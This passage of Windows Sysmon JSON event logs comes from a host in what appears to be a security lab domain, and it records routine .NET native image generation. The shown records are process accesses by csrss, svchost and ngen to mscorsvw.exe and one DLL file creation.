RNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.199\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.199","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-00107CFC0E00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-00107CFC0E00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-00107CFC0E00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-00107CFC0E00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-00107CFC0E00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-00107CFC0E00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.340\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001001D10D00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.340","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001001D10D00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001001D10D00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001001D10D00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-0010DFFF0E00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-0010DFFF0E00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:45.418\r\nProcessGuid: {A837DB8D-0494-5F25-0000-0010DFFF0E00}\r\nProcessId: 2944\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b80-0\\PresentationBuildTasks.dll\r\nCreationUtcTime: 2020-08-01 05:58:45.418","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:45.418","ProcessGuid":"{A837DB8D-0494-5F25-0000-0010DFFF0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b80-0\\PresentationBuildTasks.dll","CreationUtcTime":"2020-08-01 05:58:45.418","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
